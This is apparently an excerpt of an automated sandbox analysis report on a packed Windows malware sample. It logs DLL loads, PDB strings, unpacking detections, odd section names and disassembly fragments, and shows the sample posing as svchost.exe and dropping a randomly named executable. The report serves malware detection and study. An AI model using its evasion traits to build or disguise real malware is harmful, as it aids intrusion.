Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: dbghelp.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: netapi32.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: samcli.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: winscard.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: devobj.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: sensapi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: dbghelp.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: netapi32.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: samcli.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: winnsi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: urlmon.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: srvcli.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: winscard.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: devobj.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: sensapi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: dbghelp.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: netapi32.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: samcli.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: winscard.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: devobj.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: sensapi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: dbghelp.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: netapi32.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: samcli.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: winhttp.dll

Source: C:\Users\user\Desktop\Bpfz752pYZ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{304CE942-6E39-40D8-943A-B913C40C9CD4}\InprocServer32

Jump to behavior

Source: Bpfz752pYZ.exe

Static file information: File size 1179648 > 1048576

Source: Bpfz752pYZ.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: \??\C:\Program Files (x86)\Windows Defender\ganykah.com\??\C:\Program Files (x86)\Windows Defender\wrpcrt4.pdb\??\C:\Program Files (x86)\Windows Defender\winsta.pdb source: svchost.exe, 00000002.00000003.3255347257.0000000003399000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: winsta.pdb source: svchost.exe, 00000002.00000002.3397191515.00000000056A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdb source: svchost.exe, 00000002.00000003.3267668085.00000000086BE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Program Files (x86)\Windows Defender\winsta.pdb source: svchost.exe, 00000002.00000003.3255347257.0000000003399000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: l\wntdll.pdb source: svchost.exe, 00000002.00000002.3383219866.0000000000812000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Program Files (x86)\Windows Defender\wrpcrt4.pdb\??\C:\Program Files (x86)\Windows Defender\winsta.pdb source: svchost.exe, 00000002.00000003.3255347257.0000000003399000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wrpcrt4.pdb source: svchost.exe, 00000002.00000003.3343594271.0000000008626000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Program Files (x86)\Windows Defender\wrpcrt4.pdb\??\C:\Program Files (x86)\Windows Defender\wntdll.pdb source: svchost.exe, 00000002.00000003.3255347257.0000000003399000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: l\winsta.pdb source: svchost.exe, 00000002.00000003.3347345159.000000000338D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: svchost.exe, 00000002.00000002.3402753953.00000000086B9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wrpcrt4.pdb( source: svchost.exe, 00000002.00000003.3343594271.0000000008626000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-amd64-cygwin\jdk8u281\880\build\windows-amd64\deploy\tmp\javacplexec\obj64\javacpl.pdb552 source: Bpfz752pYZ.exe, svchost.exe.0.dr
Source:	Binary string: WinSCard.pdb( source: svchost.exe, 00000002.00000002.3398141991.0000000005870000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-amd64-cygwin\jdk8u281\880\build\windows-amd64\deploy\tmp\javacplexec\obj64\javacpl.pdb source: Bpfz752pYZ.exe, svchost.exe.0.dr
Source:	Binary string: C:\Program Files (x86)\Windows Defender\wntdll.pdb\* source: svchost.exe, 00000002.00000002.3404415145.0000000008DFB000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Program Files (x86)\Windows Defender\vojydoc.com\??\C:\Program Files (x86)\Windows Defender\wntdll.pdb source: svchost.exe, 00000002.00000003.3255347257.0000000003399000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Program Files (x86)\Windows Defender\wntdll.pdb source: svchost.exe, 00000002.00000003.3255347257.0000000003399000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdb source: svchost.exe, 00000002.00000003.3343091466.00000000086C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3402753953.00000000086C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdb( source: svchost.exe, 00000002.00000003.3343091466.00000000086C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3402753953.00000000086C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: NcYLgtXIKJgHj.exe, 00000006.00000002.2551332510.00000000005AE000.00000002.00000001.01000000.00000009.sdmp, NcYLgtXIKJgHj.exe, 00000007.00000000.2489007381.00000000005AE000.00000002.00000001.01000000.00000009.sdmp, NcYLgtXIKJgHj.exe, 0000000A.00000002.2560697130.00000000005AE000.00000002.00000001.01000000.00000009.sdmp, NcYLgtXIKJgHj.exe, 0000000E.00000002.2551302357.00000000005AE000.00000002.00000001.01000000.00000009.sdmp, NcYLgtXIKJgHj.exe, 00000010.00000002.2531133177.00000000005AE000.00000002.00000001.01000000.00000009.sdmp, NcYLgtXIKJgHj.exe, 00000014.00000002.2579234014.00000000005AE000.00000002.00000001.01000000.00000009.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2605798630.00000000005AE000.00000002.00000001.01000000.00000009.sdmp, NcYLgtXIKJgHj.exe, 00000019.00000002.2614419059.00000000005AE000.00000002.00000001.01000000.00000009.sdmp, NcYLgtXIKJgHj.exe, 0000001C.00000000.2585490628.00000000005AE000.00000002.00000001.01000000.00000009.sdmp, NcYLgtXIKJgHj.exe, 0000001F.00000000.2593001652.00000000005AE000.00000002.00000001.01000000.00000009.sdmp, NcYLgtXIKJgHj.exe, 00000022.00000002.2694069303.00000000005AE000.00000002.00000001.01000000.00000009.sdmp, NcYLgtXIKJgHj.exe, 00000024.00000002.2644364291.00000000005AE000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: wkernel32.pdb( source: svchost.exe, 00000002.00000003.3267668085.00000000086BE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: WinSCard.pdb source: svchost.exe, 00000002.00000002.3398141991.0000000005870000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: winsta.pdb( source: svchost.exe, 00000002.00000002.3397191515.00000000056A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb( source: svchost.exe, 00000002.00000002.3402753953.00000000086B9000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Unpacked PE file: 0.2.Bpfz752pYZ.exe.400000.2.unpack .text:ER;.j:R;.nkytZ:R;.N:R;.fc:W;.data:W;.s:W;.w:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Windows\apppatch\svchost.exe	Unpacked PE file: 2.2.svchost.exe.400000.0.unpack .text:ER;.j:R;.nkytZ:R;.N:R;.fc:W;.data:W;.s:W;.w:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Unpacked PE file: 6.2.NcYLgtXIKJgHj.exe.1740000.2.unpack
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Unpacked PE file: 7.2.NcYLgtXIKJgHj.exe.3100000.2.unpack
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Unpacked PE file: 10.2.NcYLgtXIKJgHj.exe.1520000.2.unpack
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Unpacked PE file: 22.2.NcYLgtXIKJgHj.exe.2340000.2.unpack
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Unpacked PE file: 34.2.NcYLgtXIKJgHj.exe.2740000.2.unpack

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Unpacked PE file: 0.2.Bpfz752pYZ.exe.400000.2.unpack
Source: C:\Windows\apppatch\svchost.exe	Unpacked PE file: 2.2.svchost.exe.400000.0.unpack

Source: C:\Users\user\Desktop\Bpfz752pYZ.exe

Code function: 0_2_00401FC0 memset,SHGetFolderPathA,PathAppendA,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,

0_2_00401FC0

Source: svchost.exe.0.dr	Static PE information: real checksum: 0x49aae8ad should be: 0x121dac
Source: Bpfz752pYZ.exe	Static PE information: real checksum: 0x307a975e should be: 0x121dac

Source: Bpfz752pYZ.exe	Static PE information: section name: .j
Source: Bpfz752pYZ.exe	Static PE information: section name: .nkytZ
Source: Bpfz752pYZ.exe	Static PE information: section name: .N
Source: Bpfz752pYZ.exe	Static PE information: section name: .fc
Source: Bpfz752pYZ.exe	Static PE information: section name: .s
Source: Bpfz752pYZ.exe	Static PE information: section name: .w
Source: svchost.exe.0.dr	Static PE information: section name: .j
Source: svchost.exe.0.dr	Static PE information: section name: .nkytZ
Source: svchost.exe.0.dr	Static PE information: section name: .N
Source: svchost.exe.0.dr	Static PE information: section name: .fc
Source: svchost.exe.0.dr	Static PE information: section name: .s
Source: svchost.exe.0.dr	Static PE information: section name: .w

Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: 0_2_004000C2 push esp; ret	0_2_004000C3
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: 0_2_0040008D push FB0DB0C3h; ret	0_2_004000B7
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: 0_2_0044C903 push cs; ret	0_2_0044C918
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: 0_2_0044C939 push cs; iretd	0_2_0044C948
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: 0_2_0044C26D push es; iretd	0_2_0044C27C
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: 0_2_00448CA0 push eax; ret	0_2_00448CCE
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: 0_2_0212065B push ebx; ret	0_2_02120677
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: 0_2_0212065B push dword ptr [esp+48h]; ret	0_2_02120747
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: 0_2_02120678 push dword ptr [esp+48h]; ret	0_2_02120747
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_004000C2 push esp; ret	2_2_004000C3
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_0040008D push FB0DB0C3h; ret	2_2_004000B7
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_0044C903 push cs; ret	2_2_0044C918
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_0044C939 push cs; iretd	2_2_0044C948
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_0044C26D push es; iretd	2_2_0044C27C
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_00448CA0 push eax; ret	2_2_00448CCE
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02CB6B03 push cs; ret	2_2_02CB6B18
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02CACB03 push esi; retf	2_2_02CACB04
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02CB6B39 push cs; iretd	2_2_02CB6B48
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02CB28A0 push eax; ret	2_2_02CB28CE
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02CAE990 push esi; retf	2_2_02CAE994
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02CACEB1 push esi; retf	2_2_02CACEB5
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02CAE62D push esi; retf	2_2_02CAE631
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02CB646D push es; iretd	2_2_02CB647C
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_029E726D push es; iretd	2_2_029E727C
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_029D4392 push ebp; retf	2_2_029D4393
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_029D410C push ebp; retf	2_2_029D410D
